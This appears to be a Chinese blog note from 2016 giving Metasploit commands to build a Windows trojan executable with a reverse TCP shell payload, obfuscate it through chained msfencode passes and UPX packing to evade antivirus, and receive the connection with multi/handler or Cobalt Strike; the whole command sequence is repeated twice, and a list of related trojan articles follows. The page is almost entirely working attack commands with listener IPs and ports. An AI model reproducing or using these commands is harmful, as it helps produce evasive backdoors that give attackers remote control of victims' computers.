Kali Linux -- Metasploit MSFvenom Generate a Trojan horse and receive a rebound(生成木马和接收反弹)
2016-12-24 19:24
891 查看
生成
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp
LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
免杀 参照老版本,没有看官方文档
msfpayloadwindows/shell_reverse_tcp
lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai-c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -ex86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o/root/Desktop/1.exe
upx加壳:upx
-5/root/Desktop/1.exe
勾选自动生成脚本
https://sourceforge.net/projects/crisp-shellcode-generator/files/
设置参数
设置文件名
使用cobalt strike进行接受反弹
Listner – 设置名字,ip,端口,使用的加密
上线后
可Explore
msf
use exploit/multi/handlerset
payload windows/shell/reverse_tcpshow optionsset
LHOST 172.16.104.130set LPORT 31337exploit
session –v
session –I number
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp
LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
免杀 参照老版本,没有看官方文档
msfpayloadwindows/shell_reverse_tcp
lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai-c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -ex86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o/root/Desktop/1.exe
upx加壳:upx
-5/root/Desktop/1.exe
勾选自动生成脚本
https://sourceforge.net/projects/crisp-shellcode-generator/files/
设置参数
设置文件名
使用cobalt strike进行接受反弹
Listner – 设置名字,ip,端口,使用的加密
上线后
可Explore
msf
use exploit/multi/handlerset
payload windows/shell/reverse_tcpshow optionsset
LHOST 172.16.104.130set LPORT 31337exploit
session –v
session –I number
相关文章推荐
- [zz]Common loading points for viruses, worms, and Trojan horse programs on Windows 2000/XP/2003
- Synchronous Send and Receive 同步发送和接收
- Generate unique strings and numbers in C#(生成一个唯一的字符串和数值)
- 生成ssh公有密钥并且注册到Github Generate ssh rsa keys and register public key on Github
- 生成ssh公有密钥而且注冊到Github Generate ssh rsa keys and register public key on Github
- 使用msfvenom生成木马用于监听别人的操作
- Metasploit应用笔记-msfvenom生成meterpreter后门代码
- 利用msfvenom生成木马程序
- Metasploit 生成***反弹shell
- Tips: 使用autotools生成动态.so库文件 / Generate .so library files using autotools in Solaris and Linux
- 熟悉msfvenom生成木马程序过程,并执行和监听控制.
- 利用msfvenom生成木马程序
- Kali环境使用Metasploit生成木马入侵安卓手机
- 2月安全回顾:盗号木马猖獗 流氓软件小波反弹
- 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
- Trojan-Proxy.Win32.Agent.if木马 -SVOHOST.EXE
- 金山毒霸2月安全回顾:盗号木马愈加猖獗 流氓软件小波反弹
- 实现接受全由代码生成的页面传值与接收
- 浅析木马服务端的生成技术
- 灰鸽子病毒——网络神偷之后应用最广的反弹端口木马